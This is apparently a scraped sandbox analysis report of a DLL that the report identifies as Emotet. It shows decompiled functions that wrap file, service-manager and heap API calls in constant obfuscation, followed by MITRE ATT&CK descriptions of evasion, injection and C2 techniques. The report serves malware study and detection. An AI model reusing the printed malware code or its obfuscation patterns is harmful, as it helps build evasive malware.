				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E008EEB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x008ed068
0x008ed06b
0x008ed06d
0x008ed070
0x008ed074
0x008ed075
0x008ed07a
0x008ed081
0x008ed087
0x008ed08e
0x008ed095
0x008ed09c
0x008ed0a3
0x008ed0a7
0x008ed0ae
0x008ed0b5
0x008ed0bc
0x008ed0c0
0x008ed0c7
0x008ed0ce
0x008ed0d5
0x008ed0dc
0x008ed0e3
0x008ed0ef
0x008ed0f7
0x008ed0fa
0x008ed101
0x008ed108
0x008ed10f
0x008ed116
0x008ed11d
0x008ed13c
0x008ed145
0x008ed14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 008ED145

Strings

7XJ, xrefs: 008ED0D5
3l}!, xrefs: 008ED0AE

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: ca18bb38b045e0c2cef67f1db58c155822e663f23227792fc0f442eef640b60a
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 262145B5D00318AFDF08DFA5C98A9EEFBB0FF14304F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 009045CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E009045CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E008FFE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E008EEB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x009045d2
0x009045d7
0x009045d9
0x009045dc
0x009045df
0x009045e2
0x009045e5
0x009045e8
0x009045eb
0x009045ee
0x009045f1
0x009045f4
0x009045f5
0x009045f7
0x009045f8
0x009045fd
0x00904607
0x0090460a
0x00904611
0x00904618
0x0090461f
0x00904626
0x0090462d
0x00904634
0x0090463b
0x00904642
0x0090465d
0x00904660
0x00904667
0x0090466e
0x00904675
0x0090467c
0x00904688
0x0090468b
0x0090469e
0x009046b5
0x009046bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 009046B5

Strings

OM , xrefs: 009045FD

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: c6744c50a6dce471055b4457e81cd244833974b829cc0a49e3851bd33fc0b273
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: AC21E072801249BB8F05DFA9CD468DEBFB5FF89304F508199F914A6220D3758A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 008F648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E008F648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E008FFE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E008EEB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x008f6491
0x008f6494
0x008f6496
0x008f6499
0x008f649c
0x008f64a0
0x008f64a1
0x008f64a6
0x008f64b0
0x008f64b4
0x008f64bb
0x008f64bf
0x008f64c6
0x008f64cd
0x008f64d1
0x008f64d8
0x008f64df
0x008f64fa
0x008f64fd
0x008f6504
0x008f650b
0x008f6512
0x008f6519
0x008f6520
0x008f6534
0x008f6543
0x008f6549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 008F6543

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: 1895b0a6d42ab1bd5f9a623e27aa0ffc041ebd38311b37f4a9d6801d7d445e03
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: 7C11F2B2C0121DBBDF05DFA5D9098DEBBB4FB00314F108598E911A6250E3B59B149F91

Uniqueness

Uniqueness Score: -1.00%

Function 008FE8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E008FE8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E008FFE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E008EEB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x008fe8bd
0x008fe8c2
0x008fe8c5
0x008fe8c6
0x008fe8ca
0x008fe8cb
0x008fe8d0
0x008fe8da
0x008fe8e1
0x008fe8e8
0x008fe8ef
0x008fe8f3
0x008fe8fa
0x008fe901
0x008fe908
0x008fe90f
0x008fe92a
0x008fe92d
0x008fe941
0x008fe94e
0x008fe954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 008FE94E

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: 2437e3fff28f02512f5ff80afeb82b8e37df3a5b377bf502014f291b23842c57
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: E911157190221DFB9B04EFE999468DEBFB4FF04304F108598E925B2211D3B18B149BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008FD11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008FD11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E008EEB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x008fd120
0x008fd124
0x008fd12b
0x008fd132
0x008fd139
0x008fd140
0x008fd144
0x008fd14b
0x008fd14f
0x008fd156
0x008fd15d
0x008fd164
0x008fd16b
0x008fd172
0x008fd176
0x008fd17d
0x008fd184
0x008fd18b
0x008fd1ac
0x008fd1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 008FD1B6

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 153a136b4f1b05b0513c2f3c00347607ff8760bffe58eaa0baf32332cf59d16c
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 841100B1C4030CEBDB44DFE5D94A69EBBB0EB00708F108588D521B6240D3B89A489F91

Uniqueness

Uniqueness Score: -1.00%

Function 0090061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0090061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E008FFE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E008EEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x00900624
0x00900627
0x00900629
0x0090062c
0x0090062f
0x00900630
0x00900631
0x00900636
0x0090063d
0x00900644
0x0090064b
0x0090064f
0x00900667
0x0090066a
0x00900671
0x00900678
0x0090067f
0x0090068b
0x0090068e
0x00900695
0x0090069c
0x009006a3
0x009006aa
0x009006b1
0x009006b8
0x009006bf
0x009006c6
0x009006d9
0x009006e5
0x009006eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 009006E5

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 7b223d685cd1343d4abbb8a3069cebd45c63560579fe260dba97e5bdc6c0f1cd
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: AC2102B1C01209ABCF14DFA9D94A99EBFB5FB10354F108198E529A6251D3B48B04CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report EcJ8rbg.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 04B4EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Function 04B485FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Function 04B52C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre